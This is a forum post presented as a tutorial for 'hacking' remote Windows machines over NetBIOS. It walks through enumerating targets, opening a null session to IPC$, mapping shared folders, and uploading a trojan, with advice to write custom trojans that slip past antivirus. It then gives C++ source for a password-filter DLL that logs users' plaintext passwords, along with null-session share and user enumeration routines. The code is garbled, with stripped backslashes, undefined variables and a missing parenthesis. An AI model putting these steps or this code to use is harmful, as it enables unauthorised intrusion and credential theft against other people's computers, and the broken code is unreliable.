Jump to content
Screech

Hacking Netbios

Recommended Posts

Posted

Well..first of all hello folks..

In this tutorial I wanna show u how to hack via NetBios.

And here is what u need:

- Windows ( for the method I'll explain here )

- Internet ;)

- NetBIOS scans

- the good old DOS console

- a bit knowledge about DOS and nbtstat.exe and net.exe ( see microsoft technet for description )

- knowledge about trojans or backdoors ( how they work...)

************************************************************************************

Lets start...

1. Fire up a DOS box

2. Now go to root ( usually c: ) and enter " nbtstat -A IP "

( without " ", IP is the IP of the remote PC. You get the IP's from your scans )

If the server/PC is hackable the result should be a table like this:

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------

computername <00> UNIQUE Registered

workgroupname <00> GROUP Registered

computername <20> UNIQUE Registered

workgroupname <1E> GROUP Registered

workgroupname <1D> UNIQUE Registered

..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers )

************************************************************************************

You can scan for NetBios with X-Scan. Also scan with a port scanner like superscan

(available at www.packetstormsecurity.nl) 'cause port 135-139 often stands for NetBios.

An original scan wit X-Scan could look like:

xxx.xxx.xxx.xxx

Administrator - [built-in account for administering the computer/domain]

Account type: Administrator

Password age: 291 Day 10 Hour 28 Minute 34 Sec.

Bad password count: 0Number logons: 9

Last logon: GMT Wed Aug 14 15:26:38 2002

Guest - [built-in account for guest access to the computer/domain]

Account type: Guest

Password age: 0 Day 0 Hour 0 Minute 0 Sec.

Bad password count: 0Number logons: 0

************************************************************************************

3. Mkay now enter this in the DOS box:

( you have to replace the xxx.... by the IP of the target and dont write the c: 'cause it is there yet ;) )

c:net view xxx.xxx.xxx.xxx

Response (possible):

System error 5 occured.

Access denied.

c:

ooops...wasn't as easy as we thought...well ok type:

c:net use xxx.xxx.xxx.xxxipc$ "" /user:"" ( this creates a zero session )

Response: The command completed successfully.

Ok..lets test it again...

c:net view xxx.xxx.xxx.xxx

Response: Shared resources on xxx.xxx.xxx.xxx

* Here it displays the resources

mkay...now we know the shared resources

Now we assign a drive to a shared folder...

c:net use m: xxx.xxx.xxx.xxx"folder" ( replace "folder" by a shared folders name )

Response: The command completed successfully.

Now we switch to our new drive:

c:m:

..usually nothing interesting in a shared folder. And because of that...

4. Now we can upload a trojan who gives us access to rest of the PC. It's good to code a

small trojan that does all what we want, because existing trojans are recognized by AV

tools. But u can also take an existing one like BO2k ...

Now upload:

m:copy c:path_to_the_trojan_here m:

Now the trojan is installed. Best thing is to upload a dll-trojan thru the other trojan that replaces a *.dll

5. Now we close the connection to the remote folder with:

c:net use m: /DELETE

******************************************************************************************

******************************************************************************************

********************** C++ source for this shit to save time ****************************

******************************************************************************************

******************************************************************************************

********************* Perhaps you have to edit it at several lines ***********************

******************************************************************************************

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>



struct UNI_STRING {

USHORT len;

USHORT maxlen;

WCHAR *buff;

};



static HANDLE fh;



BOOLEAN __stdcall InitializeChangeNotify ()

{

DWORD wrote;

fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE,

FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,

0);

WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0);

return TRUE;

}



LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,

struct UNI_STRING *passwd)

{

DWORD wrote;

WCHAR wbuf[200];

char buf[512];

char buf1[200];

DWORD len;



memcpy(wbuf, user->buff, user->len);

len = user->len/sizeof(WCHAR);

wbuf[len] = 0;

wcstombs(buf1, wbuf, 199);

sprintf(buf, "User = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



memcpy(wbuf, passwd->buff, passwd->len);

len = passwd->len/sizeof(WCHAR);

wbuf[len] = 0;

wcstombs(buf1, wbuf, 199);

sprintf(buf, "p4sswd = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



sprintf(buf, "RID = %xn", rid);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



return 0L;

}





BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)

{

char* pTemp = TargetHost.GetBuffer(256);

WCHAR wszServ[256];

LPWSTR Server = NULL;



//convert to unicode

MultiByteToWideChar(CP_ACP, 0, pTemp,

strlen(pTemp)+1,

wszServ,

sizeof(wszServ)/sizeof(wszServ[0]) );



Server = wszServ;



LPCWSTR szIpc = L"IPC$";

WCHAR RemoteResource[UNCLEN + 5 + 1];

DWORD dwServNameLen;

DWORD dwRC;



NET_API_STATUS nas;



USE_INFO_2 ui2;

SHARE_INFO_1* pSHInfo1 = NULL;

DWORD

dwEntriesRead;

DWORD dwTotalEntries;





HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;



char sharename[256];

char remark[256];



if(Server == NULL || *Server == L'')

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}



dwServNameLen = lstrlenW( Server );



if(Server[0] != L''&& Server[1] != L'')

{



RemoteResource[0] = L'';



RemoteResource[1] = L'';



RemoteResource[2] = L'';



}



else



{

dwServNameLen -= 2;



RemoteResource[0] = L'';

}



if(dwServNameLen >CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}



if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;

if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

ZeroMemory(&ui2, sizeof(ui2));

ui2.ui2_local = NULL;

ui2.ui2_remote = (LPTSTR) RemoteResource;

ui2.ui2_asg_type = USE_IPC;

ui2.ui2_password = (LPTSTR) L"";

ui2.ui2_username = (LPTSTR) L"";

ui2.ui2_domainname = (LPTSTR) L"";





nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);



dwRC = GetLastError();

if( nas == NERR_Success )



{

machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,

TVI_ROOT);



}





nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,

MAX_PREFERRED_LENGTH,



&dwEntriesRead,

&dwTotalEntries, NULL);



dwRC = GetLastError();



if( nas == NERR_Success )



{

if(dwTotalEntries > 0)



{

shareRoot = pDlg->m_Victims.InsertItem("Shares",

machineRoot,TVI_LAST);



userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);



adminRoot = pDlg->m_Victims.InsertItem("Admin",

machineRoot,TVI_LAST);



}

for(int x=0; x<(int)dwTotalEntries; x++)



{





WideCharToMultiByte(CP_ACP, 0, (const unsigned

short*)pSHInfo1->shi1_netname, -1,



sharename, 256, NULL, NULL );





WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,



remark, 256, NULL, NULL );



CString ShareDetails = sharename;



ShareDetails = ShareDetails + " - " + remark;



attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);

pSHInfo1++;

}

}





DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

TargetHost.ReleaseBuffer();

SetLastError( nas );

return FALSE;

}







bool GetAdmin(char* pServer, char* pUser, CString& Name)

{

BOOL fAdmin = FALSE;

DWORD dwDomainName,dwSize,dwAdminVal;

SID_NAME_USE use;

PSID pUserSID = NULL; // SID für Benutzer

int rc;

int iSubCount;



bool bFoundHim = 0;

dwDomainName = 256;

dwSize = 0;

dwAdminVal = 0;

iSubCount = 0;



rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

rc = GetLastError();



if(rc == ERROR_INSUFFICIENT_BUFFER)

{

pUserSID = (PSID) malloc(dwSize);





rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

}



iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));

dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));



if(dwAdminVal==500)

{

Name.Format("Admin is %s%s

", szDomainName, pUser);

bFoundHim = true;

}



delete pUserSID;

return bFoundHim;

}







void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)

{

USER_INFO_10 *pUserbuf, *pCurUser;

DWORD dwRead, dwRemaining, dwResume, dwRC;



char userName[256];

char userServer[256];



dwResume = 0;



if(pServer[0] != L'' && pServer[1] != L'')

{

RemoteResource[0] = L'';

RemoteResource[1] = L'';

RemoteResource[2] = L'';

}

else



{

dwServNameLen -= 2;





RemoteResource[0] = L'';

}



if(dwServNameLen > CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return;

}



if(lstrcatW(RemoteResource, pServer) == NULL) return;



do

{



pUserbuf = NULL;



dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf,

1024,

&dwRead, &dwRemaining, &dwResume);

if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)

break;



DWORD i;

for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)



{



WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name,

-1, userName, 256, NULL, NULL );



WideCharToMultiByte( CP_ACP, 0, pServer, -1,

userServer, 256, NULL, NULL );



if(!GotAdmin)

{

CString Admin;

GotAdmin = GetAdmin(userServer, userName, Admin);

if(GotAdmin



{

Admin.TrimRight();

HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);

pDlg->m_Victims.EnsureVisible(adminChild);



}



}



CString strUserName = userName;

pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);



}

if (pUserbuf != NULL)

NetApiBufferFree(pUserbuf);

} while (dwRC == ERROR_MORE_DATA);



if (dwRC != ERROR_SUCCESS)

printf("NUE() returned %lu

", dwRC);

}

***************************************************************************************

Some NetBios hacking tools:

DumpSec

http://www.somarsoft.com

Windows NT/2000

Legion

http://www.technotronic.com

Windows 9x/NT/2000, UNIX/Linux

NAT

http://www.packetstormsecurity.nl

Windows 9x/NT, UNIX/Linux

****************************************************************************************

Congratulation...you've hacked him now u can connect him with http://FTP.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...